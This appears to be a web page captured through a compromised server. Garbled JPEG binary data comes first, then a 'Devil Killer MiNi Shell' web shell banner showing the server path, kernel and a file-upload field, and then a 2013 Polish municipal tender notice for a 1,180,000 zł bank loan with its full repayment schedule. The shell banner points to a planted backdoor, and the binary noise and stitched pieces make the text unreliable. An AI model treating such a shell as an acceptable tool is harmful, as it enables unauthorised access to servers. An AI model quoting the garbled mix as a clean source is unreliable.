JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131003/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131003/402506-N-2013.html

<p class="kh_header"><b>Konarzyny: Udzielenie Gminie Konarzyny kredytu długoterminowego  do wysokości 1.180.000,00</b><br>
<b>Numer ogłoszenia: 402506 - 2013; data zamieszczenia: 03.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Konarzyny , ul. Szkolna 7, 89-607 Konarzyny, woj. pomorskie, tel. 059 8331011, 8331008, faks 059 8331011.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.konarzyny.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Udzielenie Gminie Konarzyny kredytu długoterminowego  do wysokości 1.180.000,00.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest udzielenie Gminie Konarzyny kredytu bankowego do wysokości 1.180.000,00 zł na sfinansowanie planowanego deficytu budżetu Gminy Konarzyny 2.Wykonawca udzieli Zamawiającemu kredytu w walucie polskiej w kwocie do 1.180.000,00 zł (słownie: jeden milion sto osiemdziesiąt tysięcy  zł) na warunkach określonych w umowie kredytowej.3.Zamawiający przeznaczy środki z kredytu na sfinansowanie planowanego deficytu budżetu gminy zgodnie z art. 89 ust 1 pkt 2 ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych (Dz. U. z 2009 r. nr 157 poz. 1240 z późn. zm.).4.Kredyt udzielony zostanie na okres od dnia zawarcia umowy do 30 września 2025 roku.5.Wykonawca otworzy rachunek kredytowy najpóźniej w dniu zawarcia umowy i prowadzić go będzie nieodpłatnie w trakcie realizacji niniejszej umowy kredytowej.6.Wykonawca dokona uruchomienia wszystkich transz kredytu zgodnie z dyspozycjami Zamawiającego bez naliczania prowizji od niewykorzystanej części kredytu.7.Wykonawca uruchomi środki kredytu zgodnie z dyspozycjami Zamawiającego w dyspozycjach składanych do Wykonawcy, bez składania odrębnego wniosku kredytowego podlegającego rozpatrzeniu. Bank uruchomi  środki poszczególnych transz kredytu w ciągu trzech dni roboczych po złożeniu przez Kredytobiorcę pisemnego wniosku.8.Ostateczny termin wykorzystania kredytu upływa z dniem 31.12.2013 roku.9.Zamawiającemu przysługiwać będzie prawo do złożenia pisemnego oświadczenia o rezygnacji z dalszego wykorzystania kredytu.10.Wykorzystanie kredytu następować będzie w walucie polskiej.11.Kwota wykorzystanego kredytu oprocentowana będzie w stosunku rocznym według zmiennej stopy procentowej. Stopa procentowa będzie równa wysokości stawki bazowej powiększonej o stałą marżę Wykonawcy, ustalonej na podstawie złożonej oferty.12.Zobowiązania zamawiającego z tytułu odsetek od kredytu regulowane będą w miesięcznych okresach obrachunkowych, jako suma zmiennej stawki bazowej WIBOR dla złotowych depozytów 1-miesięcznych na rynku międzybankowym, z ostatniego notowania w miesiącu poprzedzającym miesiąc, za który naliczane będą odsetki, powiększonej o stałą marżę Wykonawcy ustaloną na podstawie złożonej oferty.13.Odsetki są naliczane od salda kredytu według kalendarza rzeczywistego (365/366 dni). 14.O wysokości stawki bazowej (WIBOR 1M) stanowiącej podstawę obliczenia oprocentowania kredytu w danym miesiącu oraz o kwocie naliczonych odsetek za dany miesiąc, Zamawiający będzie powiadamiany pisemnie przez Wykonawcę w terminie do 20 dnia tego miesiąca.15.Marża Wykonawcy jest stała w umownym okresie kredytowania.16.Odsetki od wykorzystanego kredytu są naliczane na bieżąco w miesięcznych okresach obrachunkowych, za okres od pierwszego dnia miesiąca do ostatniego dnia miesiąca, a płatne będą do piętnastego dnia miesiąca za miesiąc poprzedni,  przy czym:16.1pierwszy okres obrachunkowy liczony jest od dnia następnego po dniu wypłaty pierwszej transzy kredytu i kończy się w dniu zakończenia okresu obrachunkowego, z tym, że okres ten nie może być krótszy niż miesiąc kalendarzowy16.2kolejne miesięczne okresy obrachunkowe liczone są od następnego dnia po zakończeniu poprzedniego okresu obrachunkowego kredytu16.3	ostatni okres obrachunkowy kończy się w dniu całkowitej spłaty kredytu16.4	jeżeli data spłaty kredytu lub odsetek przypada na dzień ustawowo wolny od pracy uważa się, że ustalony termin został zachowany, jeżeli spłata nastąpiła w pierwszym dniu roboczym po terminie określonym w umowie kredytu16.5	ustala się karencję w spłacie odsetek, liczoną od uruchomienia poszczególnych transz kredytu do dnia 31 stycznia 2014 roku. Kwota naliczonych w okresie karencji odsetek płatna będzie do 15 lutego 2014 r. Odsetki w okresie karencji nie ulegają kapitalizacji.17.Zamawiający może dokonać zmiany terminu spłaty kredytu bez ponoszenia dodatkowych kosztów na podstawie pisemnego powiadomienia Wykonawcy najpóźniej na 30 dni przed zamierzonym terminem spłaty przy czym wydłużenie okresu kredytowania poza termin określony w SIWZ w dziale III Opis przedmiotu zamówienia punkt 22 poz. 91 może nastąpić po wyrażeniu zgody przez Wykonawcę i zawarciu aneksu do umowy po podjęciu uchwały przez Radę Gminy w Konarzynach w sprawie zmiany uchwały w sprawie zaciągnięcia kredytu długoterminowego w 2013 roku, jeśli termin ten wykraczałby poza 30 września 2025 roku.18.W przypadku dokonania przez Zamawiającego przedterminowej spłaty części kredytu, Strony ustalą nowy harmonogram spłaty kredytu w formie aneksu do umowy.19.Wcześniejsza spłata całości lub części kredytu nie oznacza jego wypowiedzenia.20.	Wykonawcy nie przysługuje prawo naliczania i pobierania jakichkolwiek dodatkowych opłat i prowizji, za wyjątkiem opłat i prowizji, które będą ustalone w umowie.21.Kredyt zostanie spłacony do 30 września 2025 roku.22.Spłata kredytu nastąpi w poniższych terminach:Lp.Numer raty	Data płatności	Kwota1.Pierwsza rata	31 stycznia 2014 roku	5.000,00   2.Druga rata	28 lutego 2014 roku	5.000,00   3.Trzecia rata	31 marca 2014 roku	5.000,00   4.Czwarta rata	30 kwietnia 2014 roku	5.000,00   5.Piąta rata	31 maja 2014 roku	5.000,00   6.	Szósta rata	30 czerwca 2014 roku	5.000,00   7.	Siódma rata	31 lipca 2014 roku	5.000,00   8.	Ósma rata	31 sierpnia 2014 roku	5.000,00   9.	Dziewiąta rata	30 września 2014 roku	5.000,00   10.	Dziesiąta rata	31 października 2014 roku	5.000,00   11.	Jedenasta rata	30 listopada 2014 roku	5.000,00  12.	Dwunasta rata	31 grudnia 2014 roku	5.000,00   13.	Trzynasta rata	31 stycznia 2015 roku	5.000,00   14.	Czternasta rata	28 lutego 2015 roku	5.000,00   15.	Piętnasta rata	31 marca 2015 roku	5.000,00   16.	Szesnasta rata	30 kwietnia 2015 roku	5.000,00   17.	Siedemnasta rata	31 maja 2015 roku	5.000,00   18.	Osiemnasta rata	30 czerwca 2015 roku	5.000,00   19.	Dziewiętnasta rata	31 lipca 2015 roku	5.000,00   20.	Dwudziesta rata	31 sierpnia 2015 roku	5.000,00   21.	Dwudziesta pierwsza rata	30 września 2015 roku	5.000,00   22.	Dwudziesta druga rata	31 października 2015 roku	5.000,00   23.	Dwudziesta trzecia rata	30 listopada 2015 roku	5.000,00   24	Dwudziesta czwarta rata	31 grudnia 2015 roku	5.000,00   25	Dwudziesta piąta rata	31 stycznia 2016 roku	5.000,00   26	Dwudziesta szósta rata	29 lutego 2016 roku	5.000,00   27	Dwudziesta siódma rata	31 marca 2016 roku	5.000,00   28	Dwudziesta ósma rata	30 kwietnia 2016 roku	5.000,00   29	Dwudziesta dziewiąta rata	31 maja 2016 roku	5.000,00   30	Trzydziesta rata	30 czerwca 2016 roku	5.000,00   31	Trzydziesta pierwsza rata	31 lipca 2016 roku	5.000,00   32	Trzydziesta druga rata	31 sierpnia 2016 roku	5.000,00   33	Trzydziesta trzecia rata	30 września 2016 roku	5.000,00   34	Trzydziesta czwarta rata	31 października 2016 roku	5.000,00   35	Trzydziesta piąta rata	30 listopada 2016 roku	5.000,00   36	Trzydziesta szósta rata	31 grudnia 2016 roku	5.000,00  37	Trzydziesta siódma rata	31 stycznia 2017 roku	5.000,00   38	Trzydziesta ósma rata	28 lutego 2017 roku	5.000,00   39	Trzydziesta dziewiąta rata	31 marca 2017 roku	5.000,00   40	Czterdziesta rata	30 kwietnia 2017 roku	5.000,00   41	Czterdziesta pierwsza rata	31 maja 2017 roku	5.000,00   42	Czterdziesta druga rata	30 czerwca 2017 roku	5.000,00   43	Czterdziesta trzecia rata	31 lipca 2017 roku	5.000,00   
44	Czterdziesta czwarta rata	31 sierpnia 2017 roku	5.000,00   45	Czterdziesta piąta rata	30 września 2017 roku	5.000,00   46	Czterdziesta szósta rata	31 października 2017 roku	5.000,00   
47 Czterdziesta siódma rata	30 listopada 2017 roku	5.000,00   48	Czterdziesta ósma rata	31 grudnia 2017 roku	5.000,00   49	Czterdziesta dziewiąta rata	31 stycznia 2018 roku	5.000,00   50	Pięćdziesiąta rata	28 lutego 2018 roku	5.000,00   51	Pięćdziesiąta pierwsza rata	31 marca 2018 roku	5.000,00   52	Pięćdziesiąta druga rata	30 kwietnia 2018 roku	5.000,00   53	Pięćdziesiąta trzecia rata	31 maja 2018 roku	5.000,00   54	Pięćdziesiąta czwarta rata	30 czerwca 2018 roku	5.000,00   55	Pięćdziesiąta piąta rata	31 lipca 2018 roku	5.000,00   56	Pięćdziesiąta szósta rata	31 sierpnia 2018 roku	5.000,00   57	Pięćdziesiąta siódma rata	30 września 2018 roku	5.000,00   58	Pięćdziesiąta ósma rata	31 października 2018 roku	5.000,00   59	Pięćdziesiąta dziewiąta rata	30 listopada 2018 roku	5.000,00   60	Sześćdziesiąta rata	31 grudnia 2018 roku	5.000,00   61	Sześćdziesiąta pierwsza rata	31 stycznia 2019 roku	5.000,00   62	Sześćdziesiąta druga rata	28 lutego 2019 roku	5.000,00   63	Sześćdziesiąta trzecia rata	31 marca 2019 roku	5.000,00   64	Sześćdziesiąta czwarta rata	30 kwietnia 2019 roku	5.000,00   65	Sześćdziesiąta piąta rata	31 maja 2019 roku	5.000,00   66	Sześćdziesiąta szósta rata	30 czerwca 2019 roku	5.000,00 67	Sześćdziesiąta siódma rata	31 lipca 2019 roku	5.000,00   68	Sześćdziesiąta ósma rata	31 sierpnia 2019 roku	5.000,00   69	Sześćdziesiąta dziewiąta rata	30 września 2019 roku	5.000,00   70	Siedemdziesiąta rata	31 października 2019 roku	5.000,00   71	Siedemdziesiąta pierwsza rata	30 listopada 2019 roku	5.000,00   72	Siedemdziesiąta druga rata	31 grudnia 2019 roku	5.000,00   73	Siedemdziesiąta trzecia rata	31 stycznia 2020 roku	5.000,00   74	Siedemdziesiąta czwarta rata	29 lutego 2020 roku	5.000,00   75	Siedemdziesiąta piąta rata	31 marca 2020 roku	5.000,00   76	Siedemdziesiąta szósta rata	30 kwietnia 2020 roku	5.000,00   77	Siedemdziesiąta siódma rata	31 maja 2020 roku	5.000,00   78	Siedemdziesiąta ósma rata	30 czerwca 2020 roku	5.000,00   79	Siedemdziesiąta dziewiąta rata	31 lipca 2020 roku	5.000,00   80	Osiemdziesiąta rata	31 sierpnia 2020 roku	5.000,00   81	Osiemdziesiąta pierwsza rata	30 września 2020 roku	5.000,00   82	Osiemdziesiąta druga rata	31 października 2020 roku	5.000,00   83	Osiemdziesiąta trzecia rata	30 listopada 2020 roku	5.000,00   84	Osiemdziesiąta czwarta rata	31 grudnia 2020 roku	5.000,00   85	Osiemdziesiąta piata rata	31 stycznia 2021 roku	5.000,00   86	Osiemdziesiąta szósta rata	28 lutego 2021 roku	5.000,00   87	Osiemdziesiąta siódma rata	31 marca 2021 roku	5.000,00   88	Osiemdziesiąta ósma rata	30 kwietnia 2021 roku	5.000,00   89	Osiemdziesiąta dziewiąta rata	31 maja 2021 roku	5.000,00   90	Dziewięćdziesiąta rata	30 czerwca 2021 roku	5.000,00   91	Dziewięćdziesiąta pierwsza rata	31 lipca 2021 roku	5.000,00   92	Dziewięćdziesiąta druga rata	31 sierpnia 2021 roku	5.000,00   93	Dziewięćdziesiąta trzecia rata	30 września 2021 roku	5.000,00   94	Dziewięćdziesiąta czwarta rata	31 października 2021 roku	5.000,00   95	Dziewięćdziesiąta piąta rata	30 listopada 2021 roku	5.000,00   
96	Dziewięćdziesiąta szósta rata	31 grudnia 2021 roku	5.000,00   
 97 Dziewięćdziesiąta siódma rata	31 stycznia 2022 roku	5.000,00   98	Dziewięćdziesiąta ósma rata	28 lutego 2022 roku	5.000,00   99	Dziewięćdziesiąta dziewiąta rata	31 marca 2022 roku	5.000,00   100	Setna rata	30 kwietnia 2022 roku	5.000,00   101	Sto pierwsza rata	31 maja 2022 roku	5.000,00   102	Sto druga rata	30 czerwca 2022 roku	5.000,00   103	Sto trzecia rata	31 lipca 2022 roku	5.000,00   104	Sto czwarta rata	31 sierpnia 2022 roku	5.000,00   105	Sto piąta rata	30 września 2022 roku	5.000,00   106	Sto szósta rata	31 października 2022 roku	5.000,00   107	Sto siódma rata	30 listopada 2022 roku	5.000,00   108	Sto ósma rata	31 grudnia 2022 roku	5.000,00   109	Sto dziewiąta rata	31 stycznia 2023 roku	5.000,00   110	Sto dziesiąta rata	28 lutego 2023 roku	5.000,00   111	Sto jedenasta rata	31 marca 2023 roku	5.000,00   112	Sto dwunasta rata	30 kwietnia 2023 roku	5.000,00   113	Sto trzynasta rata	31 maja 2023 roku	5.000,00   114	Sto czternasta rata	30 czerwca 2023 roku	5.000,00   115	Sto piętnasta rata	31 lipca 2023 roku	5.000,00   116	Sto szesnasta rata	31 sierpnia 2023 roku	5.000,00   117	Sto siedemnasta rata	30 września 2023 roku	5.000,00   118	Sto osiemnasta rata	31 października 2023 roku	5.000,00   119	Sto dziewiętnasta rata	30 listopada 2023 roku	5.000,00   120	Sto dwudziesta rata	31 grudnia 2023 roku	5.000,00   121	Sto dwudziesta pierwsza rata	31 stycznia 2024 roku	24.166,67122	Sto dwudziesta druga rata	29 lutego 2024 roku	24.166,67123	Sto dwudziesta trzecia rata	31 marca 2024 roku	24.166,67124	Sto dwudziesta czwarta rata	30 kwietnia 2024 roku	24.166,67125	Sto dwudziesta piąta rata	31 maja 2024 roku	24.166,67126	Sto dwudziesta szósta rata	30 czerwca 2024 roku	24.166,67127	Sto dwudziesta siódma rata	31 lipca 2024 roku	24.166,67
128	Sto dwudziesta ósma rata	31 sierpnia 2024 roku	24.166,67
129	Sto dwudziesta dziewiąta rata	30 września 2024 roku	24.166,67130	Sto trzydziesta rata	31 października 2024 roku	24.166,67
 131Sto trzydziesta pierwsza rata	30 listopada 2024 roku	24.166,67132	Sto trzydziesta druga rata	31 grudnia 2024 roku	24.166,63133	Sto trzydziesta trzecia rata	31 stycznia 2025 roku	32.222,22134	Sto trzydziesta czwarta rata	28 lutego 2025 roku	32.222,22135	Sto trzydziesta piąta rata	31 marca 2025 roku	32.222,22136	Sto trzydziesta szósta rata	30 kwietnia 2025 roku	32.222,22137	Sto trzydziesta siódma rata	31 maja 2025 roku	32.222,22 138	Sto trzydziesta ósma rata	30 czerwca 2025 roku	32.222,22139	Sto trzydziesta dziewiąta rata	31 lipca 2025 roku	32.222,22140	Sto czterdziesta rata	31 sierpnia 2025 roku	32.222,22141	Sto czterdziesta pierwsza rata	30 września 2025 roku	32.222,24 Razem:	1.180.000,00
23.	Spłata kredytu będzie zabezpieczona w następujący sposób:
23.1	weksel własny in blanco z wystawienia Zamawiającego wraz z deklaracją wekslową 23.2	oświadczenie o poddaniu się egzekucji na podstawie bankowego tytułu egzekucyjnego do kwoty stanowiącej 2-krotność kwoty przyznanego kredytu
24.	Dokumentację związaną z prawnym zabezpieczeniem stanowią: 24.1	weksel własny in blanco z wystawienia Zamawiającego wraz z deklaracją wekslową 24.2	oświadczenie o poddaniu się egzekucji na podstawie bankowego tytułu egzekucyjnego. 25.	Kredytobiorca  zastrzega  sobie  możliwość  zaciągnięcia  kredytu  w  wysokości  niższej  niż kwota 1.180.000,00 zł, o czym poinformuje kredytodawcę ( Bank ) najpóźniej w terminie do 30 listopada 2013r. Zmniejszenie kwoty kredytu nastąpi w drodze  aneksu do umowy bez skutków finansowych dla Kredytobiorcy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2025.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żądał aby Wykonawca wykazał się posiadaniem zezwolenia na prowadzenie działalności bankowej na terenie Polski, a także realizacji usług objętych przedmiotem zamówienia, zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. Prawo bankowe (tekst jednolity Dz. U z 2002 r. Nr 72 poz. 665 z późniejszymi zmianami), a w przypadku określonym w art. 178 ust. 1 ustawy Prawo bankowe inny dokument potwierdzający rozpoczęcie działalności przed dniem wejścia w życie ustawy, o której mowa w art. 193 Prawo bankowe.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku na podstawie złożonych dokumentów lub oświadczeń według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku na podstawie złożonych dokumentów lub oświadczeń według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku na podstawie złożonych dokumentów lub oświadczeń według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku na podstawie złożonych dokumentów lub oświadczeń według formuły spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy ; pelnomocnictwo  jeżeli dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

